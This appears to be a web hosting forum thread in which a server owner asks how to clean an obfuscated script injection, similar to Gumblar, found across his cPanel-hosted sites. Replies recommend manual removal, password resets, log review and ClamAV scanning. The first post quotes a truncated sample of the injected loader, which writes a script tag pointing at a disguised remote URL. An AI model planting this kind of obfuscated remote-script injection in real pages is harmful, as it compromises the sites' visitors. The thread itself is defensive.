Infected index.xxx files on my server

[samuelmf]

Hi i have many sites of my server with Redhat ES 3 and cPanel 11.24.5-S38506 - WHM 11.24.2 - X 3.9

Many sites, have a code like:
<script>/*Exception*/ document.write('<script src='+'h@$(@t!t^p!&:#^@/^!)^/!p^l#!@a@&$$) ...... \$/ig, '')+' defer=defer></scr'+'ipt>');</script><!--9f5661a0f751133b5d2ccace4a586aaa-->

It's similar to the gumblar, but this dont create an iframe.

How could i secure my sites and remove this trojan without remove my site and my databases and other things.

Thanks in advance!

[thewebhosting]

You will have to manually remove the malicious script from all your files and reset the password of all your accounts including cpanel, FTP etc. Before doing that check the FTP logs from which IP address the malicious script was uploaded or the file being modified and block the particular IP address in your server.

[samuelmf]

Could i install on my server the Anti-Gumblar script?

[emindstech]

Hello,

Installation of Anti Gumblar wont help that much.

We would suggest you to download your all pages, related to site content to local machine scan it and and re upload it again. Make sure to change FTP password complex and confidential. And then re upload your all site related content. It would be more helpful to you.

You can get help from developer to remove the script that infected to main page or respective page.

Regards,
Eminds Tech - Kapil

[samuelmf]

Some specific antivirus software to remove the virus locally?

[cPanelDon]

Some specific antivirus software to remove the virus locally?

For server-side usage I recommend ClamAV; it is free and readily available. For a Linux RPM-based OS like CentOS or RHEL I recommend to first ensure that there are no conflicting ClamAV software packages (RPMs) installed, and then proceed to compile ClamAV from source by installing the ClamAV Connector plug-in via WHM:
WHM: Main >> cPanel >> Manage Plugins >> clamavconnector

To check for conflicting ClamAV software packages the following command may be used:

Code:

# rpm -qa | grep -i clam

To remove a conflicting RPM, simply use "rpm -e" followed by the package name.

Once ClamAV is installed I recommend reviewing usage information in the provided manual "man" documentation using the following command via root SSH access:

Code:

# man clamscan

For home or other non-server use (e.g., if scanning files on a local workstation) I personally prefer Kaspersky Anti-Virus; it is a commercially-licensed (paid) product, but there is a free trial period where the software could be tested to see if it meets your specific needs or requirements.

Reference web site and vendor forums: Kaspersky Lab & Kaspersky Lab Forum